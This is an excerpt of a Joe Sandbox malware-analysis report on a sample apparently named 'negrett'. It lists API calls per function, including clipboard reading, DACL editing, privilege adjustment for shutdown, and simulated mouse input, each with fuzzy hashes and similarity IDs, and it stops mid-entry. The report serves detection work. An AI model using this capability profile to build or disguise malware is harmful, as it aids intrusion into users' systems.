                                                • String ID:
                                                • API String ID: 2638373210-0
                                                • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                • Instruction ID: 9a74a63760b3071453009c122bba50b14b77d5bbf94271658f26a0605d7c01b9
                                                • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                • Instruction Fuzzy Hash: D4E048B06097005FDF396B28A8517B677D4DF49300F10045EF59B82352E5726845C74D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileW.KERNEL32(00000000,00000000,?,00B50704,?,?,00000000), ref: 00B503B7
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 4d68ea08e7e9a6f430d006e30a4eb54f7bfa8090549a82c861356761487fae84
                                                • Instruction ID: fb39ff182764dc992a135ba41d3535183afc4880cc1dfee8ef5bbe50aee127e7
                                                • Opcode Fuzzy Hash: 4d68ea08e7e9a6f430d006e30a4eb54f7bfa8090549a82c861356761487fae84
                                                • Instruction Fuzzy Hash: 84D06C3214010DBBDF028F84DD06EDA3FAAFB48714F014000BE1866020CB36E821AB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SystemParametersInfoW.USER32 ref: 00B11CBC
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: InfoParametersSystem
                                                • String ID:
                                                • API String ID: 3098949447-0
                                                • Opcode ID: 626b7d3a31b3cf725f5f9890818980f47c2067fd7340d31c08b7e44374030059
                                                • Instruction ID: 85342e30631cbeb52f579b27d3be0c33573d880fa1314ab6c9e5fa4766f7ea96
                                                • Opcode Fuzzy Hash: 626b7d3a31b3cf725f5f9890818980f47c2067fd7340d31c08b7e44374030059
                                                • Instruction Fuzzy Hash: 28C09B35280344AFF2144784BD8BF107794A358B00F544401F6095F5E3CFB11810D654
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00B15745: CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00B15773
                                                • GetLastError.KERNEL32(00000002,00000000), ref: 00B876DE
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: CreateErrorFileLast
                                                • String ID:
                                                • API String ID: 1214770103-0
                                                • Opcode ID: aa2b507a15e896384b42de0dfb9da57c7dba6fc581fda4d5e5752f5ab2bb5809
                                                • Instruction ID: edea1b2d8c6d0482709453f1adb3e27d47cbd82d915f5b923cdbdff01b67d1e0
                                                • Opcode Fuzzy Hash: aa2b507a15e896384b42de0dfb9da57c7dba6fc581fda4d5e5752f5ab2bb5809
                                                • Instruction Fuzzy Hash: 3681C1302487019FC714EF28C491AA9B7E1FF89354F5445ADF89A5B3A2DB30ED85CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction ID: 14a397e359e51d7ac33f0b6587d1d0520e26e1c75697675155aa104a7bdf912a
                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction Fuzzy Hash: 9B31CE75A0011A9BD718CF59E490A69FBF6FB89340B2486F5E80ACB656D731EDC1CBC0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00BA48F3
                                                • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00BA4908
                                                • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00BA4927
                                                • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00BA494B
                                                • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00BA495C
                                                • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00BA497B
                                                • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00BA49AE
                                                • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00BA49D4
                                                • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00BA4A0F
                                                • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00BA4A56
                                                • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00BA4A7E
                                                • IsMenu.USER32(?), ref: 00BA4A97
                                                • GetMenuItemInfoW.USER32 ref: 00BA4AF2
                                                • GetMenuItemInfoW.USER32 ref: 00BA4B20
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00BA4B94
                                                • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00BA4BE3
                                                • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00BA4C82
                                                • wsprintfW.USER32 ref: 00BA4CAE
                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00BA4CC9
                                                • GetWindowTextW.USER32 ref: 00BA4CF1
                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00BA4D13
                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00BA4D33
                                                • GetWindowTextW.USER32 ref: 00BA4D5A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                • String ID: %d/%02d/%02d
                                                • API String ID: 4054740463-328681919
                                                • Opcode ID: cadaacac90a95f920e2810971acd8b10f4b86389f8bbd70800708ac53c5543bc
                                                • Instruction ID: 555e396a44d5f0b654b94c1d631423b172b02b3d3ae9f59038f9f1c90e13c875
                                                • Opcode Fuzzy Hash: cadaacac90a95f920e2810971acd8b10f4b86389f8bbd70800708ac53c5543bc
                                                • Instruction Fuzzy Hash: 86120471604214AFEB259F28DC49FAE7BF8EF86710F1041A9F51AEB1E1DBB49940CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00B710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B71114
                                                  • Part of subcall function 00B710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00B70B9B,?,?,?), ref: 00B71120
                                                  • Part of subcall function 00B710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B70B9B,?,?,?), ref: 00B7112F
                                                  • Part of subcall function 00B710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B70B9B,?,?,?), ref: 00B71136
                                                  • Part of subcall function 00B710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B7114D
                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B70BCC
                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B70C00
                                                • GetLengthSid.ADVAPI32(?), ref: 00B70C17
                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00B70C51
                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B70C6D
                                                • GetLengthSid.ADVAPI32(?), ref: 00B70C84
                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00B70C8C
                                                • HeapAlloc.KERNEL32(00000000), ref: 00B70C93
                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B70CB4
                                                • CopySid.ADVAPI32(00000000), ref: 00B70CBB
                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B70CEA
                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B70D0C
                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B70D1E
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B70D45
                                                • HeapFree.KERNEL32(00000000), ref: 00B70D4C
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B70D55
                                                • HeapFree.KERNEL32(00000000), ref: 00B70D5C
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B70D65
                                                • HeapFree.KERNEL32(00000000), ref: 00B70D6C
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00B70D78
                                                • HeapFree.KERNEL32(00000000), ref: 00B70D7F
                                                  • Part of subcall function 00B71193: GetProcessHeap.KERNEL32(00000008,00B70BB1,?,00000000,?,00B70BB1,?), ref: 00B711A1
                                                  • Part of subcall function 00B71193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00B70BB1,?), ref: 00B711A8
                                                  • Part of subcall function 00B71193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00B70BB1,?), ref: 00B711B7
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                • String ID:
                                                • API String ID: 4175595110-0
                                                • Opcode ID: ec71936d6a4dc7e5c45aec0cc93756efbc94bd5ee809d37d79ede67bcfab9ea2
                                                • Instruction ID: 89f89e6ec36b6f6ecfecffd227a1539f258deb008ae2d81a968ccae7783bde52
                                                • Opcode Fuzzy Hash: ec71936d6a4dc7e5c45aec0cc93756efbc94bd5ee809d37d79ede67bcfab9ea2
                                                • Instruction Fuzzy Hash: 4871427190020AEBDF20DFA4DC45FAEBBB8FF05310F1485A5F919A7291DB71A905CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • OpenClipboard.USER32(00BACC08), ref: 00B8EB29
                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 00B8EB37
                                                • GetClipboardData.USER32 ref: 00B8EB43
                                                • CloseClipboard.USER32 ref: 00B8EB4F
                                                • GlobalLock.KERNEL32 ref: 00B8EB87
                                                • CloseClipboard.USER32 ref: 00B8EB91
                                                • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00B8EBBC
                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 00B8EBC9
                                                • GetClipboardData.USER32 ref: 00B8EBD1
                                                • GlobalLock.KERNEL32 ref: 00B8EBE2
                                                • GlobalUnlock.KERNEL32(00000000,?), ref: 00B8EC22
                                                • IsClipboardFormatAvailable.USER32(0000000F), ref: 00B8EC38
                                                • GetClipboardData.USER32 ref: 00B8EC44
                                                • GlobalLock.KERNEL32 ref: 00B8EC55
                                                • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00B8EC77
                                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00B8EC94
                                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00B8ECD2
                                                • GlobalUnlock.KERNEL32(00000000,?,?), ref: 00B8ECF3
                                                • CountClipboardFormats.USER32 ref: 00B8ED14
                                                • CloseClipboard.USER32 ref: 00B8ED59
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                • String ID:
                                                • API String ID: 420908878-0
                                                • Opcode ID: d72c9ae99ac0a6b694c1d83f3220703887fa52c51b48614699d50b6256372ff2
                                                • Instruction ID: b7fa5bd423dd66c0876eb92446d53a344fdd8625b44a0be153b6d3140a1a4560
                                                • Opcode Fuzzy Hash: d72c9ae99ac0a6b694c1d83f3220703887fa52c51b48614699d50b6256372ff2
                                                • Instruction Fuzzy Hash: AC61DD34204301AFD300EF24D885F6ABBE4EF85754F584599F466972A2DF30E949CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 00B869BE
                                                • FindClose.KERNEL32(00000000), ref: 00B86A12
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B86A4E
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B86A75
                                                  • Part of subcall function 00B19CB3: _wcslen.LIBCMT ref: 00B19CBD
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B86AB2
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B86ADF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                • API String ID: 3830820486-3289030164
                                                • Opcode ID: e0523f7bed01ebcb8b4a2aa16a2910c601aca03e2b8d3539bc9d2effc29758e0
                                                • Instruction ID: 22ee85f5f2cc8644fc9400b264648f3b26fe9f2cbb2f8a3b83f359374339d4cb
                                                • Opcode Fuzzy Hash: e0523f7bed01ebcb8b4a2aa16a2910c601aca03e2b8d3539bc9d2effc29758e0
                                                • Instruction Fuzzy Hash: 0AD15072508340AFC314EBA4D896EABB7ECEF88704F44495DF589C7191EB34DA49CB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: "$'$0$9$:$\NL$]${$}
                                                • API String ID: 0-3286379650
                                                • Opcode ID: 70b51c61ce3b28379b7168ed3fc1a4dd8ae338b5dc462b43de5506081808ceb2
                                                • Instruction ID: 32ed35e079addde5091d7589146e9a225515d5971f6fdddb2d65b1abc7367eb1
                                                • Opcode Fuzzy Hash: 70b51c61ce3b28379b7168ed3fc1a4dd8ae338b5dc462b43de5506081808ceb2
                                                • Instruction Fuzzy Hash: 0593B175E00226DFDF24CF9CC8907ADB7B1FF48714F24856AE945AB281EB709985CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                • String ID:
                                                • API String ID: 1737998785-0
                                                • Opcode ID: 437bef707dfc0d2e531f8fee25ce31f0ad52a63aef78ed3c291aa554d3ccd766
                                                • Instruction ID: b773229ac2e0aba4ca77a00dde91ea998bdf9daba6762d364467dd4f2a45ac45
                                                • Opcode Fuzzy Hash: 437bef707dfc0d2e531f8fee25ce31f0ad52a63aef78ed3c291aa554d3ccd766
                                                • Instruction Fuzzy Hash: 7A418B35204611AFE720EF19D889B59BFE5EF45329F14C099E4298B6B2CB35EC42CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00B716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B7170D
                                                  • Part of subcall function 00B716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B7173A
                                                  • Part of subcall function 00B716C3: GetLastError.KERNEL32 ref: 00B7174A
                                                • ExitWindowsEx.USER32(?,00000000), ref: 00B7E932
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                • String ID: $ $@$SeShutdownPrivilege
                                                • API String ID: 2234035333-3163812486
                                                • Opcode ID: 51ad9c7a0ec644839cba4ea18219d012a6e11ea629964d44f56bdc3f2dc00057
                                                • Instruction ID: 999013227ba1fe247a265cb9c389587aa12f1b914524934cd199d664dae875ce
                                                • Opcode Fuzzy Hash: 51ad9c7a0ec644839cba4ea18219d012a6e11ea629964d44f56bdc3f2dc00057
                                                • Instruction Fuzzy Hash: 5D01D0736102116BE75426789C8ABBB76DCDF18750F1584D2F937E31D1D6709C404194
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: __floor_pentium4
                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                • API String ID: 4168288129-2761157908
                                                • Opcode ID: 1f65f358428bf57a944d37e08fdab87e7588392f5885349a6f92b82e50fba368
                                                • Instruction ID: 9b4e949501f3976a07ebb0d57867ed0965338035337a0e836bb68ab08ec1179e
                                                • Opcode Fuzzy Hash: 1f65f358428bf57a944d37e08fdab87e7588392f5885349a6f92b82e50fba368
                                                • Instruction Fuzzy Hash: B8C22872E086298FDB25CE289D807EAB7F5FB48304F1541EAD85DE7241E774AE819F40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _wcslen.LIBCMT ref: 00B864DC
                                                • CoInitialize.OLE32(00000000), ref: 00B86639
                                                • CoCreateInstance.OLE32(00BAFCF8,00000000,00000001,00BAFB68,?), ref: 00B86650
                                                • CoUninitialize.OLE32 ref: 00B868D4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                • String ID: .lnk
                                                • API String ID: 886957087-24824748
                                                • Opcode ID: 08db5d95a095ac803a5d30dd13f80ec4afa022e4fe5db262c90f52d0f2bdc54b
                                                • Instruction ID: d2d28906ed4f67971183903d0e7575005ba447b9cbce65aa3a078c77ebb2cd93
                                                • Opcode Fuzzy Hash: 08db5d95a095ac803a5d30dd13f80ec4afa022e4fe5db262c90f52d0f2bdc54b
                                                • Instruction Fuzzy Hash: A3D14A71508341AFC304EF24C8919ABB7E9FF98704F5049ADF5958B2A1EB70ED49CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetForegroundWindow.USER32 ref: 00B922E8
                                                  • Part of subcall function 00B8E4EC: GetWindowRect.USER32(?,?), ref: 00B8E504
                                                • GetDesktopWindow.USER32 ref: 00B92312
                                                • GetWindowRect.USER32(00000000), ref: 00B92319
                                                • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00B92355
                                                • GetCursorPos.USER32(?), ref: 00B92381
                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00B923DF
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                • String ID:
                                                • API String ID: 2387181109-0
                                                • Opcode ID: 67a5824ed747dd47b1d4d4b2366b9671ad395468baa78695c3a2db32450d4ffc
                                                • Instruction ID: 8f96e0babfbe02c607243e3c94f6a3381b84bddc74a1e236e99b6e67f082c492
                                                • Opcode Fuzzy Hash: 67a5824ed747dd47b1d4d4b2366b9671ad395468baa78695c3a2db32450d4ffc
                                                • Instruction Fuzzy Hash: 7631E572908315AFCB20DF14D84AF5BBBE9FF89310F000969F59997191DB34E908CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                • API String ID: 0-1546025612
                                                • Opcode ID: 9353be4427922f656bbdffcd0410a08b7ede3d0ebae8a32ff62f4f36be3f1590
